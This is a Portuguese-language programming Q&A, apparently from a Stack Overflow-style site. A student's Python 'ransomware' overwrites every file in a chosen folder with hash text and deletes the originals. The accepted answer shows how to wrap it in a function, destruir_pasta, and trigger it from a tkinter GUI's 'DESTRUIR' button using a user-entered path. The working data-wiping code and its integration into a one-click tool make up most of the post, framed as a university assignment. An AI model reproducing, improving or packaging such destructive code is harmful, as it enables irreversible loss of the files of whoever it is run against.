# Quero "capturar" o caminho e usar ele em outro programa

Tags: python, python-3.x, tkinter, gui

Tenho um "ransomware", no qual eu coloco um caminho pra uma pasta e ele criptografa/destrói

Tenho um trabalho pra apresentar na faculdade onde eu tenho que criar uma interface gráfica, criei uma simples tela, com 2 botões e uma cx de texto, a cx de texto seria onde o usuário colocaria o caminho da pasta e ai, os 2 botões, 1 seria pra executar o código e o outro pra sair do programa

Código do Ransomware:

```
import hashlib
import os
import string
import sys

                    #Windows - teste
#c = 'C:\\Users\\teste\\Desktop\\teste' 

                    #teste import
c = '' #AQUI Q EU GOSTARIA DE IMPORTAR O CAMINHO QUE O USUÁRIO ESCREVER NA CX DE TEXTO 


for files in os.listdir(c):
    os.chdir(c)
    with open(files, 'rb') as r:
        data = r.read()
        encrypt = hashlib.sha512(data).hexdigest()
        encrypt = encrypt.encode('utf-8') #resolveu o erro
        new_file = '(perdido)' +os.path.basename(files)
        with open(new_file, 'wb') as n:
            n.write(encrypt*0x31)
            n.close()
            r.close()

            os.remove(files)
```

Código da GUI:

```
from tkinter import *

#corpo do programa
janela = Tk()
janela.title("Destruir.exe")
janela.geometry('300x200+0+0')
#--

#definições
    #definição da ação que o botão1 vai fazer ao ser pressionado
def botao_pressionado():
    import imp

def botao2_pressionado():
    exit()
#--

#botão
    #botão1 = ação
        #especificações do botão1, coordenadas, texto e ação
b1 = Button(janela, text="DESTRUIR", command = botao_pressionado)
b1.pack(anchor = W)
b1.place(x=110, y=80)

    #botão2 = sair
        #sai do programa
b2 = Button(janela, text="SAIR", command = botao2_pressionado)
b2.pack(anchor = W)
b2.place(x=130, y=110)
#--

#campo de escrita/entrada de informação
    #usuário fornece a informação
e1 = Entry(janela)
e1.pack(side=TOP)
e1.place(x=50, y=50)
#--

janela.mainloop()
```

Comment: @NoobSaibot basicamente não sabia como pegar o q o usuário digitar no campo de texto e jogar no outro código sem dar erro, pq quando eu deixo o caminho vazio, ele da erro

Answer (score 2, accepted):

Quando você usa interface gráfica, geralmente o script que executa o `mainloop()` passa a ser o "principal", assim, é ele que deve importar o outro script.

Para isso você deve encapsular a funcionalidade do script em uma função ou método, de forma que seja possível chamá-lo à vontade quando importado.

Por exemplo, no seu arquivo `ransomware.py` coloque o código dentro de uma função chamada `destruir_pasta` que recebe o `c` como parâmetro:

`ransomware.py`:

```
import hashlib
import os
import string
import sys    

def destruir_pasta(c):    
    for files in os.listdir(c):
        # ... etc resto do código aqui ...
```

Daí no outro arquivo `gui.py` dentro de `botao_pressionado`, você pode chamar essa função:

`gui.py`

```
import ransomware

def botao_pressionado():
    pasta_digitada = e1.get() # pega o valor do Entry e1
    ransomware.destruir_pasta(pasta_digitada)
```

A função `destruir_pasta` foi definida para receber como parâmetro `c` a pasta a destruir, então, basta recuperar o valor digitado pelo usuário a partir do Entry e passar esse valor para a função.

OBS: Lembrando que o seu código como está escrito **destrói** realmente a pasta, portanto, não haverá uma forma de recuperar os arquivos depois, mesmo se a "vítima" pagar o ransom. Por isso o nome `destruir_pasta` é adequado.

Comment: Muito obrigado, resolveu, não sabia que eu tinha que criar uma "def" dentro do ransomware para poder ativar no outro arquivo, vlw mesmo, vc acabou de me garantir um 10 kkkkk